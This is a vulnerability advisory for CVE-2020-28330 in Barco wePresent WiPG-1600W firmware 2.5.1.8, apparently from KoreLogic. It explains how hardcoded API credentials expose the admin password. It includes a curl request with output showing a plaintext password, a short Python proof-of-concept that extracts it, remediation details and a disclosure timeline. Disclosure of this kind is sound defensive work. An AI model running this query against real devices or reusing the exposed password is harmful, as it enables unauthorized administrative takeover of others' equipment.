Barco wePresent Admin Credentials Exposed In Plain-text

Vulnerability Details

Affected Vendor: Barco
Affected Product: wePresent WiPG-1600W
Affected Version: 2.5.1.8
Platform: Embedded Linux
CWE Classification: CWE-523: Unprotected Transport of Credentials
CVE ID: CVE-2020-28330

Vulnerability Description

An attacker armed with hardcoded API credentials from
KL-001-2020-004 (CVE-2020-28329) can issue an authenticated
query to display the admin password for the main web user
interface listening on port 443/tcp.

Technical Description

An authenticated request using the hardcoded credentials in
KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0
will display the current admin password in clear text. An
attacker will now have the admin password on the device, and
can use the web interface to make any configuration changes
to the device using the web UI.

$ curl -k -u ‘admin:[REDACTED]’
https://192.168.2.200:4001/w1.0 { “status”: 200, “message”:
“Get successful”, “data”: { “key”: “/w1.0”, “value”: {
“ClientAccess”:{
“EnableAirplay”: true
}, “Configuration”:{
“RestartSystem”: false, “ShutdownSystem”: false,
“SetAction”: “NoAction”, “SetActionUrl”: “”
}, “DeviceInfo”:{
“ArticleNumber”: “Barco_Number”,
“CurrentUptime”: 58524, “InUse”: false,
“ModelName”: “WiPG-1600”, “Sharing”: false,
“Status”: 0, “StatusMessage”: “”, “TotalUptime”:
473871262, “TotalUsers”: 0, “LoginCodeOption”:
“Random”, “LoginCode”: “3746”, “SystemPassword”:
“W3Pr3s3nt”, <- Admin password
… …

Mitigation and Remediation Recommendation

The vendor has released an updated firmware (2.5.3.12) which
remediates the described vulnerability. Firmware and release
notes are available at:

https://www.barco.com/en/support/software/R33050104

Credit

This vulnerability was discovered by Jim Becher (@jimbecher) of
KoreLogic, Inc.

Disclosure Timeline

2020.08.24 - KoreLogic submits vulnerability details to
Barco.
2020.08.25 - Barco acknowledges receipt and the intention
to investigate.
2020.09.21 - Barco notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline. Barco requests to delay
coordinated disclosure until 2020.12.11.
2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
2020.09.25 - Barco informs KoreLogic of their intent to acquire
CVE number for this vulnerability.
2020.11.09 - Barco shares CVE number with KoreLogic and announces
their intention to release the updated firmware
ahead of schedule, on 2020.11.11. Request that KoreLogic
delay public disclosure until 2020.11.20.
2020.11.11 - Barco firmware release.
2020.11.20 - KoreLogic public disclosure.

Proof of Concept

The following is a basic Python function to return the admin password:

def get_admin_pw(host, port, adminpw):
apiuser = “admin”
apipw = “[REDACTED]”
url = “https://” + host + “:” + port + “/w1.0”
response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)
dict = response.json()
adminpw = dict[‘data’][‘value’][‘DeviceInfo’][‘SystemPassword’]
return adminpw